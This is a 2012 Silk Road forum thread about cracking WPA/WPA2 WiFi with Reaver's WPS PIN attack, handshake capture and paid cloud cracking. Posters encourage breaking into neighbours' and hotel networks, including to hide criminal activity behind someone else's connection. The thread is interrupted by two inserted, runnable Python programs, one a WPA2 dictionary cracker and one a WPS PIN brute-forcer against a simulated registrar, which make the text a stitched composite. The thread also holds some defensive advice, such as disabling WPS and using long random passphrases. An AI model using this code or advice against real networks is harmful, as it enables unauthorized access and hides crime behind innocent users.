Silk Road forums
Discussion => Security => Topic started by: novocaine on February 18, 2012, 07:42 am
-
This is giving the nerd in me a big hard-on...
I want one... NOW
Not only will it crack wpa/wpa2... it will crash a network intermittently as it is doing it 8)
apparently
Anyone use the pro or the open source version yet?
http://www.tacnetsol.com/products/
Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.
WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.
Current attacks against WPA networks involve the computation of rainbow tables based on a dictionary of potential keys and the name (SSID) of the network being attacked. Rainbow tables must be re-generated for each network encountered and are only successful if the PSK is a dictionary word. However, Reaver is not restricted by the limitations of traditional dictionary-based attacks. Reaver is able to extract the WPA PSK from the access point within 4 - 10 hours and roughly 95% of modern consumer-grade access points ship with WPS enabled by default.
You can find the free, open source version of Reaver at Google Code
Tactical Network Solutions is now pleased to offer a commercial version of Reaver called Reaver Pro. Reaver Pro is a dedicated hardware solution that allows operators to effortlessly conduct WPS attacks via a graphical web interface. The hardware is preconfigured and tested for field use; operators only have to plug it in and start the attack. Simply connect a laptop to the ethernet port and open a web browser, and you'll automatically be redirected to the Reaver Attack Interface.
Unfortunately, the first limited edition run of Reaver Pro is now sold out.
-
I don't see this as that special. Anyone with Linux/Ubuntu can run a few commands to break into pretty much any wireless network.
I have my fun when I go to hotels and in neighborhoods with lots of connections. Cracking a connection takes about 10 minutes, and once you get in you can intercept any data that goes through it. This is why people say wireless is not secure. It's easy as fuck to crack.
Tutorials are all over YouTube: "Hacking Wireless with Ubuntu or Linux".
-
Tommyhawk, do you mean it's easy to hack WPA/WPA2 in 10 min? Maybe you mean WEP? Those are weak.
For WPA/WPA2 I heard Russians had a system using GPU computation (CUDA) to brute force a password in 10 min. I guess you're never safe using wifi.
Another method involves using "the cloud" to crack it. Upload the key to a server that brute forces it. You pay depending on the time it takes.
Source: http://securecloudreview.com/2011/01/use-the-cloud-to-brute-force-wpa-passwords/
-
Hey, I searched for some info on the CCS (cloud cracking suite) for cracking passwords using Amazon servers, but it seems that all the info is from February 2011 and I can't find anything more recent.
The last post on the author's blog is from February 2011.
Do you know any other links where I can educate myself on this matter? :)
-
With 'the cloud', are they still brute forcing using dictionary words?
-
Shit, I want one. How much are they going for? Didn't see a price.
I know some of you guys know how to hack cable modems also. Would pay for that information/knowledge!
-
The only way to break a WPA/WPA2 password is brute force -- you use a dictionary of words and start guessing. Rainbow tables only speed up the process, but the password still had to be in the dictionary to begin with.
Here's a cloud site that will crack for free:
http://wpa.darkircop.org/index.php?off=0
Note what they say about Rainbow tables -- it just speeds things up.
Think of it this way. Your wireless connection is broadcasting, just like a radio station. With a radio, you can tune into a station. With computer software (and a wireless card), you can tune in to wireless internet traffic...and start recording. What are you listening for? A special communication between the PC and the router, called a handshake, which contains the PSK (technically, a 3-way handshake, but you don't care for the purposes of this exercise).
Great, now you have that handshake recorded. Your software that recorded it saved it as a PCAP file. That's the file those cracking sites want you to upload -- the PCAP file that contains the 3 way handshake.
Here's one that will do it for $25:
http://www.skidhacker.com/wpacrack
There were a few others, one that even took bitcoins.
Here's how to record the traffic:
1. Get backtrack (it's free, and legal -- http://www.backtrack-linux.org/downloads/)
2. Boot it. If it doesn't recognize your wireless card, buy the Alfa one off of Amazon for $30 (http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU)
3. Client = Computer, Access Point = Router. Learn it. Know it. Live it.
4. Follow these directions: http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Yes, you can kick others off their connection. What you do is instead of just listening, you start broadcasting noise which interferes with their signal, or broadcast to the router (in their name) connection termination requests. Pretty lame if you ask me.
My point with all of this is that the software is garbage, and a ripoff. You need that handshake. If you have that....you're ready to rock. Just don't tell anyone you did it, because they'll call you a script kiddie (which you are, but everyone has to start somewhere. Don't stop there; the fun is really getting started. You'll lose a lot of hours to this if you're ambitious enough).
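The capture-then-crack workflow the post above describes, as an added example that is not part of the thread and not aircrack-ng's own code: a WPA2 4-way handshake never carries the PSK itself; what the sniffer gets is the SSID, both MACs, both nonces and an EAPOL frame whose MIC was computed from a key derived from the passphrase. An offline attack therefore recomputes that derivation (PBKDF2 with the SSID as salt, then the 802.11i PRF, then HMAC) for every candidate word and compares MICs. The SSID, MAC addresses, nonces and EAPOL frame below are constructed, and `capture_handshake()` stands in for the PCAP the cracking sites ask for.

```python
"""
Offline dictionary attack against a WPA2-PSK four-way handshake.
Added example, not code from the thread. Every value here is constructed
(SSID, MACs, nonces, EAPOL frame) so it runs offline with no capture.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + key-descriptor fields that precede the MIC (77)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public material sniffed from messages 1 and 2."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 / key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (STA -> AP) with the MIC field zeroed."""
    frame = bytes([0x02, 0x03]) + (95).to_bytes(2, "big")  # EAPOL version, type=Key, body length
    frame += b"\x02"                                       # descriptor type: RSN
    frame += b"\x01\x0a"                                   # key info: version 2, pairwise, MIC set
    frame += b"\x00\x10"                                   # key length
    frame += (1).to_bytes(8, "big")                        # replay counter
    frame += snonce                                        # key nonce (32 bytes)
    frame += bytes(16) + bytes(8) + bytes(8)               # key IV, RSC, key ID
    assert len(frame) == MIC_OFFSET
    frame += bytes(16)                                     # MIC field, zero for the computation
    frame += b"\x00\x00"                                   # key data length
    return frame


def capture_handshake(passphrase: str, ssid: str) -> dict:
    """Stand-in for a PCAP: simulates the exchange and returns only what a sniffer
    sees. The passphrase is used to produce the MIC but is never on the air."""
    ap_mac = bytes.fromhex("001122334455")                  # constructed
    sta_mac = bytes.fromhex("66778899aabb")                 # constructed
    anonce = hashlib.sha256(b"constructed anonce").digest()  # constructed, 32 bytes
    snonce = hashlib.sha256(b"constructed snonce").digest()  # constructed, 32 bytes
    eapol = build_eapol_msg2(snonce)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_wpa2(hs: dict, wordlist):
    """For each candidate: PMK -> PTK -> KCK -> MIC; a match means the word is the PSK."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    words = ["password", "12345678", "sunshine1", "letmein"]
    print("recovered:", crack_wpa2(capture_handshake("sunshine1", "HomeNet"), words))
    print("not in list:", crack_wpa2(capture_handshake("x9#Tq!vL2p", "HomeNet"), words))
```

The 4096 PBKDF2 iterations are the whole cost of the attack: every guess pays them, which is why GPU rigs and rented clusters exist for this and why a table built for one SSID is useless against another. The guess is only ever as good as the wordlist; a random 15+ character PSK is simply never in it.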
-
Thanks unbiased, you have suckered me in even more ;)
So this reaver thing... saying it does not use the traditional dictionary crack but uses a different exploit similar to what you have shared about the handshake thing... is BS or what?
I'm a fast learner, just not very quick today ;)
Edit: I am watching that video on Hak5 about the Reaver and it does not use the traditional offline brute force attack. It is an active attack that can be used as a DoS attack because it goes for the PIN, which resets most routers. I have no idea if this is BS or not lol
www.tacnetsol.com/news/2012/2/8/reaver-on-hak5.html
-
Five days old article:
http://www.forbes.com/sites/andygreenberg/2012/02/14/moxie-marlinspikes-cloudcracker-aims-for-speedier-cheaper-password-cracking/
Cloudcracker:
https://cloudcracker.com/
-
Ha! I wondered what happened to wpacracker.com. An upgrade!
I don't know about hacking the router itself, but I don't think that would work. Let's say you could, but then what? You change the WPA password? I think the owners of the router would notice that they can't login anymore, and will just reset it. Give backtrack a whirl, it's free.
-
If you get the WPA password you don't have to change it. You've got access to an internet connection that is not yours. Professional hackers rent an apartment in a very populated area with as many wifi connections as possible. Hack one or a few of them and have a decent connection that is not shared with dozens like a public wifi. In case it goes sour, their ass is not on the line. WEP connections are preferred because they're easy to crack (10-20 min).
-
This tool doesn't actually crack your PSK or anything like that. It's actually exploiting a known hole in the WPS (WiFi Protected Setup) "push button" setup feature on most access points and routers.
Wikipedia:
In December 2011 researcher Stefan Viehböck reported a design and implementation flaw that makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. A successful attack on WPS allows unauthorized parties to gain access to the network. The only effective workaround is to disable WPS.[4]
The vulnerability centers around the acknowledgement messages sent between the registrar and enrollee when attempting to validate a PIN. The PIN, which is printed on the side of each WPS-enabled Wi-Fi router, is an eight digit number. Since the last digit is a checksum of the previous digits,[6] there are seven unknown digits in each PIN, yielding 10^7 = 10,000,000 possible combinations.
When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately. Since the first half of the PIN consists of four digits (10,000 possibilities) and the second half has only three active digits (1,000 possibilities), at most only 11,000 guesses are needed before the PIN is recovered. This is a reduction of three orders of magnitude from the number of PINs that would have to be tested absent the design flaw. As a result, a practical attack can be completed in just a few hours. The ease or difficulty of exploiting this flaw is implementation dependent, as Wi-Fi router manufacturers could defend against such attacks by slowing or disabling the WPS feature after several failed PIN validation attempts.[3] Reaver first tests all the common PINs for the Wi-Fi, then it goes from 0000 to 9999; when it has found the first four digits it starts to brute-force the other half. E.g., let's say it found 5423 as the first digits. Now it starts to test the other half: it starts with 54230000, then goes to 54230001, and so on.
A tool has been developed in order to show the attack is practical.[7] The firm that released the tool, Tactical Network Solutions in Maryland, says that it has known about the vulnerability since early 2011 and has been using it.[8]
Methods for disabling WPS have been published for some models of the following brands:
Belkin[9]
D-Link[10]
Netgear[11]
TP-Link[12]
In some devices, notably those made by Linksys, disabling WPS in the user interface does not result in the feature actually being disabled. The device remains vulnerable to attack.[5]
Disable WPS on your router and apply the latest firmware update (especially if you have a linksys device) to remove this attack vector.
If your WPA2 PSK is 15+ characters of truly random data, I doubt anyone will be able to attack it directly. Might as well make it 20+ characters at that point so it's truly impractical to crack. Even then I wouldn't trust WiFi for truly sensitive operations, even on your local LAN. I'd either VPN locally (sounds paranoid but why not?) or just use good ol' ethernet when true security is required.
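The arithmetic in the quoted Wikipedia text (checksum digit, halves acknowledged separately, at most 11,000 guesses) and the mitigation it mentions (locking out after several failed PINs), as an added example that is not part of the thread and not Reaver's code. The `Registrar` class is a simulation of the AP side of the WPS PIN exchange, not a real access point; the PINs and the lockout threshold are made-up values.

```python
"""
Why the WPS PIN flaw collapses a 10^7 search to at most 11,000 attempts,
and what a lockout does to it. Added example; the registrar is simulated.
"""


def wps_checksum(first7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN body: digits in odd positions (1st, 3rd,
    5th, 7th) weighted 3, the rest weighted 1, then the digit that makes the sum a
    multiple of 10. E.g. 1234567 -> 0, so 12345670 is a well-formed PIN."""
    accum, n = 0, first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class Registrar:
    """Simulated WPS registrar. Like the protocol, it acknowledges the two halves
    of the PIN separately (NACK after M4 vs. NACK after M6). With max_failures=None
    it never locks out, which is the vulnerable behaviour; otherwise it refuses
    further attempts after that many failed PINs (made-up threshold)."""

    def __init__(self, pin: str, max_failures=None):
        if not wps_pin_valid(pin):
            raise ValueError("PIN fails checksum")
        self.pin, self.max_failures = pin, max_failures
        self.attempts = self.failures = 0

    def try_pin(self, pin: str) -> str:
        if self.max_failures is not None and self.failures >= self.max_failures:
            return "locked"
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            self.failures += 1
            return "NACK after M4"   # leaks: first half wrong
        if pin[4:] != self.pin[4:]:
            self.failures += 1
            return "NACK after M6"   # leaks: first half right, second half wrong
        return "M7"                  # success; M7 is where the WPA PSK is handed over


def split_bruteforce(reg: Registrar):
    """Reaver-style two-phase search: <= 10,000 tries for the first half, then
    <= 1,000 for the three free digits of the second half (checksum computed)."""
    first = None
    for i in range(10_000):
        r = reg.try_pin(f"{i:04d}0000")
        if r == "locked":
            return None
        if r != "NACK after M4":
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        first7 = int(first + f"{j:03d}")
        r = reg.try_pin(f"{first7:07d}{wps_checksum(first7)}")
        if r == "locked":
            return None
        if r == "M7":
            return f"{first7:07d}{wps_checksum(first7)}"
    return None


if __name__ == "__main__":
    reg = Registrar("12345670")
    print(split_bruteforce(reg), "after", reg.attempts, "attempts (naive: up to 10,000,000)")
    locked = Registrar("12345670", max_failures=3)
    print(split_bruteforce(locked), "against a registrar that locks after 3 failures;",
          locked.attempts, "attempts got through")
```

The lockout in the simulation is instant and permanent to keep the point visible; real APs that do anything usually go quiet for a minute or so after a few failures, which turns a few-hour attack into days. It is still only a speed bump, and it does nothing on the devices the quoted text says ignore the "disable WPS" setting, so disabling WPS and confirming with a scan is the real fix.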
-
Thanks heaps ;)
So pretty much anyone with a default post 2008 wps router in my neighborhood better watch OUT!! :P 8)
Just a quick question because I am totally illiterate when it comes to this and I do not really know what questions to ask to find the answers but if somebody can just briefly answer...
If I am running Tor, for better anonymity... Ethernet or jacking someones wifi?
-
IMHO,
Even for wifi cracking you'll need proper equipment like a compatible network card and a decent antenna (you can buy it on eBay or Amazon for 20 bucks). There's plenty of information on specific forums. I think you should learn how to use Backtrack Linux. Google it.
Jacking someone's wifi will give you another layer of defense in case shit hits the fan. And don't hack a wifi if it's only you and your neighbor.
-
Actually I read somewhere that on like 50% of routers where you disabled WPS, the function was still active. lol. And before you spend the 4-10 hrs cracking WPS, be sure to take the time and try all the default WPS codes like 01234567. I jumped for joy when I found out about WPS and Reaver attacks.
---------------------------------------------------------------------------------
"Only to live, to live and live! Life, whatever it may be!"
-
How, with today's high security requirements, open standards and open software, can such a design flaw occur?
The WPA2 + AES are still safe IMHO. But the WPS should be disabled on all devices.
-
Just an update.
The reaver pro is now available via hakshop
$99US or like $2.50aus :P
http://hakshop.myshopify.com/products/reaver-pro
-
Don't have to buy; lots of tutorials to exploit WPS. As for WPA cracking, simply use the aircrack tools to capture the handshake and upload it to a password cracking service that you pay hourly to run on an Amazon GPU cluster instance to break the key.
https://www.wpacracker.com/
-
Which is ok if they have used a dictionary word? But who uses dictionary words these days.